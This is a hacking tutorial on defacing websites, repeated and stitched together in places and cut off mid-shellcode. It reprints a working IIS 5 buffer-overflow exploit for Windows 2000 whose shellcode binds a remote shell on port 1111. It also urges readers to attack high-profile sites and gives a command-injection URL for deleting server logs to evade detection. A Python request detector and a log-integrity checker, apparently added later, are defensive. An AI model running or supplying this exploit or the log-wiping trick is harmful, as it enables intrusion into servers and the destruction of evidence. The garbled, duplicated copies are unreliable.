worth remembering.

Various Security Measures

Website defacement has become a serious problem for IT (Information Technology) based companies; every day thousands of websites are defaced. Even government websites are defaced, for different reasons, the most common being cyber war: just as there are wars between rival countries in the real world, there are cyber wars in the wired world.

If you want to see the web attack archive, visit the following site:

http://defaced.alldas.org

Now some security measures for system administrators:

- First of all, organise your web root into suitable directories: images in an image directory, server-side scripts in their own directory, and so on. The point is not tidiness but permissions. Directories that hold static content should not be executable, directories that hold scripts should not be writable by the account the web server runs as, and script mappings you do not use (on IIS 5: .htr, .idq, .ida, .printer and the rest) should be removed, because every mapped extension is an ISAPI extension exposed to the network. A web root configured without this separation is prone to many attacks.

- Be aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

Every web server has vulnerabilities, but there is no need to fear them: download and apply the latest patch for each one. The exploit in this tutorial, for instance, fails against an IIS 5 server with the April 2002 cumulative IIS patch installed.

The last thing is that you must be able to predict the moves of a malicious cracker or script kiddie. You need to know how a cracker breaks into your site or web server and the motive behind the attack; you must think, act and work like a hacker, and take the cracker out at the root.

So this completes my tutorial on defacing websites. I hope you have understood the involutions of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM


Page 18: Defacing Website

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is called as an exploit code these are written in

powerful programming languages like C Perl or sometimes JAVA

Exploit Codes are written according to the vulnerability

Vulnerabilities were discovered in the past nowadays it has been

seen that server softwares and operating systems are patched for

these vulnerabilities So you canrsquot just execute exploit code to

break into a server you must overwork an exploit code so that it

works according to your needs One more thing I must mention is

that you must keep yourself updated with latest vulnerabilities by

visiting the sites that I have mentioned earlier in the tutorial

Well I think its better that you code your own exploit code in Perl

or C in order to break into websites

NOTE I am talking about high profile websites I am not talking

about lame websites coded in notepad

Keeping yourself safe

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

    addr.sin_family = AF_INET;
    addr.sin_port = htons(webport);
    addr.sin_addr.s_addr = inet_addr(destIP);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        puts("Socket create error");
        return -1;
    }
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }
    char buff[4096];
    /* payload bytes as printed in the tutorial, with the \x escapes restored */
    char *shellcode =
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";
    char *s1 = "POST ";  /* " HTTP/1.1\r\n" */
    char *s2 = "Accept: */*\r\n";
    char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char *sc = "0\r\n\r\n\r\n";
    /* 8 KB of 0x90 with the payload at the very end, used as the request-target */
    char shellcodebuff[1024 * 8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1], shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;
    char sendbuff[1024 * 16];
    memset(sendbuff, 0, 1024 * 16);
    /* chunked POST; AAAA and BBBB are placeholders patched below (srcdata and
       jmpaddr are passed to sprintf but not consumed by the format string) */
    sprintf(sendbuff, "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, srcdata, jmpaddr, sc);
    /* length is taken before the addresses are written in, since they may contain zero bytes */
    int sendlen = strlen(sendbuff);
    *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;
    result = send(s, sendbuff, sendlen, 0);
    if (result == -1)
    {
        puts("Send shellcode error");
        return -1;
    }
    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff) - 1, 0);  /* keep the terminator strstr() relies on */
    /* a normal HTML reply means the server handled the request and the overflow did not happen */
    if (strstr(buff, "<html>") != NULL)
    {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error, Try again!");
        return -1;
    }
    shutdown(s, 0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try run this program again!");
    return 0;
}

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run it. Now you must be wondering what the use of this code is. Actually the C code causes an overflow in IIS on Windows 2000 and commands the system to bind a shell to port 1111. So once the exploit works there will be a shell bound to port 1111 on the target system. To work it out you must telnet to the target IP on port 1111; through this you will be connected to the system without any kind of authentication.
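As an added example (not part of the tutorial and not CHINANSL's code), here is the defender's view of the request the program above sends: a small checker that a proxy or traffic-capture script could run, flagging an oversized request-target padded with 0x90 bytes, non-printable bytes in the request line, and a chunked body whose framing does not add up. Both sample requests are constructed; the suspect one carries only padding and 0xCC filler, no payload.

```python
# Added example, not part of the tutorial or of the CHINANSL exploit: a
# checker for the request shape that exploit sends (oversized request-target
# padded with 0x90, non-printable bytes, chunked body with bad framing).
# Both sample requests are constructed; the suspect one carries only padding.
import re

MAX_TARGET_LEN = 1024                       # alert threshold for the request-target
PRINTABLE = re.compile(rb"[\x20-\x7e]*")    # printable ASCII only

# Constructed benign request: a normal chunked form post.
BENIGN_REQUEST = (
    b"POST /login.asp HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n"
    b"b\r\nuser=alice&\r\n5\r\npw=hi\r\n0\r\n\r\n"
)

# Constructed suspect request shaped like the exploit's: the .asp path is
# followed by a NOP sled and 0xCC filler (not a payload), and the chunked body
# declares a 16-byte chunk but supplies only four bytes before the AAAA/BBBB
# chunks that the exploit overwrites with addresses.
SUSPECT_REQUEST = (
    b"POST /iisstart.asp" + b"\x90" * 2048 + b"\xcc" * 16 + b" HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n"
    b"10\r\n\xcc\xcc\xcc\xcc\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n0\r\n\r\n\r\n"
)


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into request-line parts, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    method = parts[0]
    if len(parts) >= 3:
        # Padding may itself contain spaces, so the target is everything
        # between the method and the trailing version token.
        version, target = parts[-1], b" ".join(parts[1:-1])
    else:
        version, target = b"", b" ".join(parts[1:])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def chunk_payloads(body: bytes):
    """Walk a chunked body. Returns (list of chunk data, framing_ok)."""
    chunks, pos = [], 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            return chunks, False                # no size line at all
        try:
            size = int(body[pos:end].split(b";")[0].strip(), 16)
        except ValueError:
            return chunks, False                # size field is not hex
        pos = end + 2
        if size == 0:
            return chunks, True                 # last-chunk marker reached
        data = body[pos:pos + size]
        chunks.append(data)
        if len(data) < size or body[pos + size:pos + size + 2] != b"\r\n":
            return chunks, False                # declared size does not match
        pos += size + 2


def classify(raw: bytes) -> list:
    """Return the indicators found in one request; an empty list means benign."""
    req = parse_request(raw)
    target, reasons = req["target"], []
    if len(target) > MAX_TARGET_LEN:
        reasons.append("oversized request-target")
    if not PRINTABLE.fullmatch(target):
        reasons.append("non-printable bytes in request-target")
    if target.count(b"\x90") >= 16:
        reasons.append("NOP sled in request-target")
    if req["headers"].get(b"transfer-encoding", b"").lower() == b"chunked":
        chunks, ok = chunk_payloads(req["body"])
        if not ok:
            reasons.append("malformed chunk framing")
        if any(not PRINTABLE.fullmatch(c) for c in chunks):
            reasons.append("binary data inside chunked body")
    return reasons


if __name__ == "__main__":
    for name, raw in (("benign", BENIGN_REQUEST), ("suspect", SUSPECT_REQUEST)):
        print(name, classify(raw) or ["clean"])
```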

Various Security Measures

Website defacement has become a terrible problem for IT (Information Technology) based companies. Every day thousands of websites are defaced. Well, even government websites are defaced for different reasons; the most common reason is cyber war. Just as in reality there are wars between two rival countries, similarly in the wired world there are cyber wars.

If you want to see the web attack archive, visit the following site:

http://defaced.alldas.org

Now some security measures for the system administrators:

- First of all you must coordinate and organize your web root with suitable directories. What I mean to say is that you must organize your files, like images in an image directory, one for server-side contents, and so on and so forth. If you don't configure your web root properly then your web server will be prone to many attacks.

- You must be aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

Well, every web server is vulnerable, but you must not fear; you must download the latest patches for the particular vulnerability. Well, the last thing is that you must be able to predict the moves of a malicious cracker or a script kiddie. You need to know how a cracker breaks into your site or web server, you need to know the motive behind the attack, and you must think, act and work like a hacker and take the cracker out from the root.

So this completes my tutorial on Defacing Websites. I hope you have understood the involutions of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM


The above code is called an exploit code; these are written in powerful programming languages like C, Perl or sometimes Java. Exploit codes are written according to the vulnerability. Vulnerabilities were discovered in the past; nowadays it has been seen that server software and operating systems are patched for these vulnerabilities. So you can't just execute exploit code to break into a server; you must rework an exploit code so that it works according to your needs. One more thing I must mention is that you must keep yourself updated with the latest vulnerabilities by visiting the sites that I have mentioned earlier in the tutorial. Well, I think it's better that you code your own exploit code in Perl or C in order to break into websites.

NOTE: I am talking about high profile websites; I am not talking about lame websites coded in Notepad.

Keeping yourself safe

Well, you must be familiar with server software like Apache, Microsoft IIS etc. So you must know about the log files, which record each and every request made to the server. As it records everything, system administrators will have no problem catching the malicious cracker or script kiddie, as the log file will have the IP (Internet Protocol) address, and through the IP address you can trace the cracker or the script kiddie.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. So you can use a cross site scripting vulnerability to clear the log files. You can do this by executing the following URL:

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE: The above URL can be used on Apache server software.
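As an added example (not from the tutorial), the administrator's answer to the log-clearing trick described above: a keyed hash chain over access-log entries, with the key and the most recent tag held off the web server, so that a deleted or truncated entry shows up the next time the chain is checked. The log lines and the key are constructed for the demonstration.

```python
# Added example, not from the tutorial: a keyed hash chain over web-server log
# lines so that a deleted or truncated entry is detectable afterwards. The key
# and the latest tag would live on a separate log collector, not on the web
# server itself. Log lines and key below are constructed.
import hashlib
import hmac

# Constructed Apache-style access-log entries.
LOG_LINES = [
    b'198.51.100.7 - - [10/Apr/2002:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326',
    b'198.51.100.7 - - [10/Apr/2002:13:55:40 +0000] "POST /cgi-bin/test-cgi HTTP/1.1" 200 512',
    b'203.0.113.9 - - [10/Apr/2002:13:56:01 +0000] "GET /images/logo.gif HTTP/1.1" 200 8041',
]
KEY = b"constructed-demo-key"      # in practice: generated once, kept off the web server
GENESIS = b"\x00" * 32             # tag "before" the first entry


def chain_append(prev_tag: bytes, line: bytes, key: bytes = KEY) -> bytes:
    """Tag for one entry: HMAC over the previous tag and the entry itself."""
    return hmac.new(key, prev_tag + b"\n" + line, hashlib.sha256).digest()


def build_chain(lines, key: bytes = KEY):
    """Return [(line, tag)] where each tag depends on every earlier entry."""
    tag, out = GENESIS, []
    for line in lines:
        tag = chain_append(tag, line, key)
        out.append((line, tag))
    return out


def verify_chain(entries, key: bytes = KEY) -> int:
    """Index of the first entry whose tag does not fit, or -1 if intact.
    Removing or editing an entry breaks every tag that follows it."""
    tag = GENESIS
    for i, (line, stored) in enumerate(entries):
        tag = chain_append(tag, line, key)
        if not hmac.compare_digest(tag, stored):
            return i
    return -1


def detect_truncation(entries, last_known_tag: bytes) -> bool:
    """True if the log no longer ends at the tag the collector last recorded
    (entries deleted from the end, or the file wiped entirely)."""
    return not entries or not hmac.compare_digest(entries[-1][1], last_known_tag)


if __name__ == "__main__":
    chain = build_chain(LOG_LINES)
    print("intact chain, first bad index:", verify_chain(chain))
    without_cgi = [chain[0], chain[2]]          # the test-cgi request removed
    print("entry removed, first bad index:", verify_chain(without_cgi))
    print("log wiped:", detect_truncation([], chain[-1][1]))
```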

In case of IIS on Windows 2000, you can use the following method to get a DOS shell through telnet.

The following code exploits a buffer overflow in IIS 5 on Windows 2000 Server, opens port 1111 and binds a shell to it. If the exploit is successful then all you have to do is use telnet to connect to port 1111 of the target and the system is yours.

/* Windows 2000 Server Exploit By CHINANSL Security Team
   Test on Windows 2000 Chinese Version, IIS 5.0, not patched.
   Warning: THIS PROGRAM WILL ONLY TEST
   CHINANSL Technology CO.,LTD  http://www.chinansl.com
   keji@chinansl.com */

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment (lib, "Ws2_32")

int main(int argc, char *argv[])
{
    if (argc != 4)
    {
        printf("%s ip port aspfilepath\n\n", argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n", argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }
    /* hard-coded addresses for the build the authors tested against */
    DWORD srcdata = 0x01e2fb1c - 4;  /* 0x00457474; address of SHELLCODE */
    DWORD jmpaddr = 0x00457494;      /* 0x77ebf094; 0x01e6fcec; "\x1c\xfb\xe6\x01"; "\x0c\xfb\xe6\x01" */
    char *destIP = argv[1];
    char *destFile = argv[3];
    int webport = atoi(argv[2]);
    char *pad = "\xcc\xcc\xcc\xcc";  /* ADPA */  /* "\x02\x02\x02\x02"; PADP 16 bytes */
    WSADATA ws;
    SOCKET s;
    long result = 0;
    if (WSAStartup(0x0101, &ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(webport);
    addr.sin_addr.s_addr = inet_addr(destIP);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        puts("Socket create error");
        return -1;
    }
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }
    char buff[4096];
    /* payload bytes as printed in the tutorial, with the \x escapes restored */
    char *shellcode =
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
